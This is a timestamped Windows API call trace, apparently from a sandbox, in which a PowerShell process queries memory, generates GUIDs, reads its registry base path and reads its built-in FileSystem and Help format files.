[0078.611] VirtualQuery (in: lpAddress=0xcb960, lpBuffer=0xcc820, dwLength=0x30 | out: lpBuffer=0xcc820*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.611] VirtualQuery (in: lpAddress=0xcb960, lpBuffer=0xcc820, dwLength=0x30 | out: lpBuffer=0xcc820*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.612] VirtualQuery (in: lpAddress=0xcb960, lpBuffer=0xcc820, dwLength=0x30 | out: lpBuffer=0xcc820*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.613] VirtualQuery (in: lpAddress=0xcb960, lpBuffer=0xcc820, dwLength=0x30 | out: lpBuffer=0xcc820*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.613] VirtualQuery (in: lpAddress=0xcb960, lpBuffer=0xcc820, dwLength=0x30 | out: lpBuffer=0xcc820*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.614] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x3b85a35c, Data2=0xcd81, Data3=0x47be, Data4=([0]=0x81, [1]=0xe9, [2]=0xe8, [3]=0x27, [4]=0x52, [5]=0xca, [6]=0xc1, [7]=0xed))) returned 0x0 [0078.615] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0xd6182589, Data2=0x8a2c, Data3=0x4ec4, Data4=([0]=0x95, [1]=0xfa, [2]=0x75, [3]=0x5e, [4]=0x9a, [5]=0x3e, [6]=0x59, [7]=0x49))) returned 0x0 [0078.615] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x8b5acaf7, Data2=0x706d, Data3=0x4d1c, Data4=([0]=0xae, [1]=0xe2, [2]=0xaf, [3]=0xab, [4]=0xe, [5]=0x74, [6]=0x2f, [7]=0xdd))) returned 0x0 [0078.615] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x52656481, Data2=0xc404, Data3=0x43fc, Data4=([0]=0x8d, [1]=0x3c, [2]=0xdc, [3]=0xfb, [4]=0xef, [5]=0x67, [6]=0x87, [7]=0x1d))) returned 0x0 [0078.616] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x909218da, Data2=0x4d04, Data3=0x48c5, Data4=([0]=0x97, [1]=0x59, [2]=0xc5, [3]=0x23, [4]=0x85, [5]=0x5b, [6]=0x44, [7]=0xda))) returned 0x0 [0078.616] VirtualQuery (in: lpAddress=0xcbc20, lpBuffer=0xccae0, dwLength=0x30 | out: lpBuffer=0xccae0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.616] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x78889ad5, Data2=0xa468, Data3=0x4b3e, Data4=([0]=0xbc, [1]=0x1, [2]=0xf3, [3]=0x85, [4]=0x7b, [5]=0x6f, [6]=0x0, [7]=0xb9))) returned 0x0 [0078.617] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x23b4a42, Data2=0xfbf9, Data3=0x4852, Data4=([0]=0x89, [1]=0x2d, [2]=0x5a, [3]=0x8c, [4]=0xa8, [5]=0x46, [6]=0xe7, [7]=0xca))) returned 0x0 [0078.617] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0xa01070d8, Data2=0xbcf7, Data3=0x4d85, Data4=([0]=0xa3, [1]=0x40, [2]=0xb6, [3]=0xef, [4]=0x50, [5]=0x32, [6]=0x52, [7]=0x29))) returned 0x0 [0078.618] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0xd1688a1d, Data2=0x9be4, Data3=0x4fa1, Data4=([0]=0x9a, [1]=0xfd, [2]=0x9a, [3]=0xd, [4]=0x99, [5]=0xf3, [6]=0x84, [7]=0x99))) returned 0x0 [0078.618] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x185a065c, Data2=0x460, Data3=0x44da, Data4=([0]=0xb3, [1]=0x7e, [2]=0xf1, [3]=0xaa, [4]=0xbb, [5]=0x46, [6]=0x15, [7]=0xe8))) returned 0x0 [0078.619] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x48c51b71, Data2=0x71b1, Data3=0x49b8, Data4=([0]=0x92, [1]=0x85, [2]=0x4b, [3]=0x8e, [4]=0x63, [5]=0xd4, [6]=0x43, [7]=0x36))) returned 0x0 [0078.619] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x8b2abd40, Data2=0x55ba, Data3=0x473c, Data4=([0]=0x90, [1]=0x6a, [2]=0xf5, [3]=0x73, [4]=0xac, [5]=0x5d, [6]=0x94, [7]=0xfa))) returned 0x0 [0078.619] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0xc3aba80d, Data2=0x422a, Data3=0x425d, Data4=([0]=0xbd, [1]=0xee, [2]=0x9c, [3]=0x84, [4]=0xe3, [5]=0x45, [6]=0x99, [7]=0x3e))) returned 0x0 [0078.620] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x77713f83, Data2=0x8781, Data3=0x415b, Data4=([0]=0x94, [1]=0xcd, [2]=0x9c, [3]=0x32, [4]=0xb, [5]=0xf5, [6]=0x4c, [7]=0x6e))) returned 0x0 [0078.620] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x5279ea08, Data2=0xb936, Data3=0x4373, Data4=([0]=0x86, [1]=0xac, [2]=0x46, [3]=0x36, [4]=0x32, [5]=0xa0, [6]=0xff, [7]=0xb8))) returned 0x0 [0078.621] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x1ffe986a, Data2=0x3030, Data3=0x49e9, Data4=([0]=0xad, [1]=0xcb, [2]=0xca, [3]=0x5a, [4]=0xf3, [5]=0x76, [6]=0xf3, [7]=0x1d))) returned 0x0 [0078.621] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x24a8553e, Data2=0xe735, Data3=0x4cee, Data4=([0]=0xa3, [1]=0x97, [2]=0x33, [3]=0xb1, [4]=0xc6, [5]=0xf1, [6]=0x20, [7]=0x8))) returned 0x0 [0078.621] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0xa0d788ac, Data2=0x4aca, Data3=0x40d4, Data4=([0]=0x8b, [1]=0xcc, [2]=0x2a, [3]=0x69, [4]=0xa3, [5]=0x96, [6]=0xf5, [7]=0x3b))) returned 0x0 [0078.621] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x3c7bbc98, Data2=0xe9f8, Data3=0x4d49, Data4=([0]=0x9d, [1]=0x34, [2]=0xc8, [3]=0x72, [4]=0xe9, [5]=0xf, [6]=0xdf, [7]=0x76))) returned 0x0 [0078.622] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0xd26b4065, Data2=0x5c05, Data3=0x4484, Data4=([0]=0xaf, [1]=0xe6, [2]=0xb7, [3]=0x86, [4]=0x51, [5]=0x61, [6]=0x2a, [7]=0x12))) returned 0x0 [0078.622] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0xad49f4b0, Data2=0xa541, Data3=0x40dd, Data4=([0]=0xa0, [1]=0xa1, [2]=0x6b, [3]=0x7e, [4]=0x5f, [5]=0x97, [6]=0xbd, [7]=0xf2))) returned 0x0 [0078.623] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0xc5dd2c82, Data2=0x52dd, Data3=0x4eb8, Data4=([0]=0x9a, [1]=0xb9, [2]=0x97, [3]=0xd9, [4]=0xd8, [5]=0xac, [6]=0xae, [7]=0x98))) returned 0x0 [0078.623] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0xdb50388f, Data2=0xccec, Data3=0x49d8, Data4=([0]=0x87, [1]=0x6b, [2]=0x67, [3]=0xdd, [4]=0xe9, [5]=0x97, [6]=0xe4, [7]=0xe6))) returned 0x0 [0078.623] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0xfbde53d3, Data2=0x433e, Data3=0x4ad2, Data4=([0]=0x92, [1]=0xb1, [2]=0x3e, [3]=0x42, [4]=0x46, [5]=0x22, [6]=0x1d, [7]=0x76))) returned 0x0 [0078.624] VirtualQuery (in: lpAddress=0xcb960, lpBuffer=0xcc820, dwLength=0x30 | out: lpBuffer=0xcc820*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.624] VirtualQuery (in: lpAddress=0xcb960, lpBuffer=0xcc820, dwLength=0x30 | out: lpBuffer=0xcc820*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.627] VirtualQuery (in: lpAddress=0xcb960, lpBuffer=0xcc820, dwLength=0x30 | out: lpBuffer=0xcc820*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.628] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x65fb0059, Data2=0x738e, Data3=0x46d6, Data4=([0]=0x8e, [1]=0x9a, [2]=0x6f, [3]=0x5, [4]=0x28, [5]=0xc2, [6]=0xe3, [7]=0x39))) returned 0x0 [0078.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcc770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0078.629] SetErrorMode (uMode=0x1) returned 0x1 [0078.629] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310 [0078.629] GetFileType (hFile=0x310) returned 0x1 [0078.629] SetErrorMode (uMode=0x1) returned 0x1 [0078.629] GetFileType (hFile=0x310) returned 0x1 [0078.629] ReadFile (in: hFile=0x310, lpBuffer=0x36466b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36466b8*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.630] ReadFile (in: hFile=0x310, lpBuffer=0x36466b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36466b8*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.631] ReadFile (in: hFile=0x310, lpBuffer=0x36466b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36466b8*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.631] ReadFile (in: hFile=0x310, lpBuffer=0x36466b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36466b8*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.633] ReadFile (in: hFile=0x310, lpBuffer=0x36466b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36466b8*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.633] ReadFile (in: hFile=0x310, lpBuffer=0x36466b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36466b8*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.633] ReadFile (in: hFile=0x310, lpBuffer=0x36466b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36466b8*, lpNumberOfBytesRead=0xcccf8*=0x119, lpOverlapped=0x0) returned 1 [0078.633] ReadFile (in: hFile=0x310, lpBuffer=0x36466b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36466b8*, lpNumberOfBytesRead=0xcccf8*=0x0, lpOverlapped=0x0) returned 1 [0078.633] CloseHandle (hObject=0x310) returned 1 [0078.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0078.634] SetErrorMode (uMode=0x1) returned 0x1 [0078.634] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccca0 | out: lpFileInformation=0xccca0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1 [0078.634] SetErrorMode (uMode=0x1) returned 0x1 [0078.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0078.634] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xccd88 | out: phkResult=0xccd88*=0x310) returned 0x0 [0078.634] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccd0c, lpData=0x0, lpcbData=0xccd08*=0x0 | out: lpType=0xccd0c*=0x1, lpData=0x0, lpcbData=0xccd08*=0x56) returned 0x0 [0078.634] CoTaskMemAlloc (cb=0x5a) returned 0x1b8f0310 [0078.634] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcccdc, lpData=0x1b8f0310, lpcbData=0xcccd8*=0x56 | out: lpType=0xcccdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcccd8*=0x56) returned 0x0 [0078.634] CoTaskMemFree (pv=0x1b8f0310) [0078.635] RegCloseKey (hKey=0x310) returned 0x0 [0078.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0078.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcc880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0078.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.637] VirtualQuery (in: lpAddress=0xcb820, lpBuffer=0xcc6e0, dwLength=0x30 | out: lpBuffer=0xcc6e0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.637] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0xec0a0c3e, Data2=0xaab1, Data3=0x43ca, Data4=([0]=0xa1, [1]=0xba, [2]=0xab, [3]=0xf4, [4]=0xd7, [5]=0xd7, [6]=0x76, [7]=0x83))) returned 0x0 [0078.637] VirtualQuery (in: lpAddress=0xcb960, lpBuffer=0xcc820, dwLength=0x30 | out: lpBuffer=0xcc820*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.638] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x4afdb89b, Data2=0xf497, Data3=0x4ff6, Data4=([0]=0x87, [1]=0x2c, [2]=0x4d, [3]=0x95, [4]=0x1a, [5]=0x31, [6]=0x21, [7]=0xdc))) returned 0x0 [0078.638] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0xb91b6cc, Data2=0x30d4, Data3=0x4c8b, Data4=([0]=0xae, [1]=0x3f, [2]=0xa7, [3]=0x47, [4]=0x7c, [5]=0xaa, [6]=0x7d, [7]=0x8))) returned 0x0 [0078.638] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0xe931bf82, Data2=0x1b1a, Data3=0x40c2, Data4=([0]=0x8a, [1]=0x1b, [2]=0x89, [3]=0x67, [4]=0xc8, [5]=0x26, [6]=0xb4, [7]=0x7a))) returned 0x0 [0078.638] VirtualQuery (in: lpAddress=0xcb960, lpBuffer=0xcc820, dwLength=0x30 | out: lpBuffer=0xcc820*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.639] VirtualQuery (in: lpAddress=0xcb960, lpBuffer=0xcc820, dwLength=0x30 | out: lpBuffer=0xcc820*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcc770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0078.639] SetErrorMode (uMode=0x1) returned 0x1 [0078.639] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310 [0078.639] GetFileType (hFile=0x310) returned 0x1 [0078.639] SetErrorMode (uMode=0x1) returned 0x1 [0078.639] GetFileType (hFile=0x310) returned 0x1 [0078.639] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.641] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.641] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.641] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.642] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.643] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.643] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.643] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.644] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.644] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.645] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.645] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.645] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.646] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.646] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.646] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.648] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.648] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.648] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.649] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.649] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.649] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.650] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.650] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.650] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.650] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 